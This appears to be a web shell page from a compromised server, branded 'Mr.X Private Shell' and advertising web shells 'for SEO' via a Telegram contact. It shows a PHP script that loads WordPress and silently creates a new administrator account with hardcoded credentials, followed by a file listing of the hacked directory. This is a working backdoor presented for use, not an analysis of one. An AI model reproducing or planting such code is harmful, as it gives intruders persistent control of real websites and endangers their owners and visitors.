__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// Load WordPress framework
require_once('/var/www/html/com/wp-login.php');
// Define new admin user details
$new_username = 'aasdjha';
$new_password = 'asdf@#$sae14!';
$new_name= 'Tishk International Univeristy';
$new_posts= '5';
$new_email = 'busin@enoactic.com';
// Check if user already exists
if ( !username_exists($new_username) && !email_exists($new_email) ) {
// Create new user
$user_id = wp_create_user( $new_username, $new_password, $new_email );
// Set the role to administrator
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
echo 'User created successfully.';
} else {
echo 'User already exists.';
}
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .htaccess | File | 255 B | 0644 |
|
| ajax.php | File | 699 B | 0644 |
|